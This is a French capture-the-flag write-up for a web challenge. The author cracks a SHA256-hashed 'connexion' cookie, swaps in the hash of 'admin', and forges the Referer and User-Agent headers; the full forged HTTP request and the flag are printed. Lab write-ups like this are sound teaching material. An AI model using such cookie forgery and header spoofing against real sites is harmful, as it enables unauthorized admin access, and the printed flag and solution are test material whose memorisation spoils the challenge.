Rien d'intéressant dans le code source, on jette donc un oeil aux cookies. On trouve un cookie "connexion" qui contient la valeur
8aca4f36774f82a67c507cb9c96679482e2cc767f2d38502269557a566b092fb
Une chaine hexadécimale de 64 charactères (256 bits), il s'agit probablement d'un hash.
SHA256 fournit des empreintes en 256 bits, on s'oriente donc de ce côté là.
A ce moment là chacun sa méthode - tool d'attaque par dictionnaire ou base de hash en ligne - pour casser le hash. Du coup on trouve :
stranger
On va donc essayer de se donner les privilèges administrateur :
$ echo -n "admin" | sha256sum -
8c6976e5b5410415bde908bd4dee15dfb167a9c873fc4bb8a81f6f2ab448a918 -
On remplace la valeur dans le cookie et un nouveau message s'affiche :
Are you the real administrator ? Remember: You need to come from the "russian.deep-web.org" website with the "Black Hat Browser" navigator !
Une petite traduction :
Souvenez-vous : dans l'en-tête de la requête HTTP, le
Refererdoit être russian.deep-web.org et leUser-Agentdoit indiquer que le navigateur est "Black Hat Browser"
Plusieurs façons de faire ça, une solution rapide et simple consiste à ouvrir le Network Monitor de firefox → clic droit sur la requête GET / → Edit and resend.
Host: srht.santhacklaus.xyz
User-Agent: Black Hat Browser
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Referer: russian.deep-web.org
Connection: keep-alive
Cookie: connexion=8c6976e5b5410415bde908bd4dee15dfb167a9c873fc4bb8a81f6f2ab448a918
Upgrade-Insecure-Requests: 1
Cache-Control: max-age=0
En envoie et on récupère le flag.
Well done ! Take your flag: IMTLD{B3c4u5e_sQL_iNj3cti0n5_4r3_0v3r4tt3D}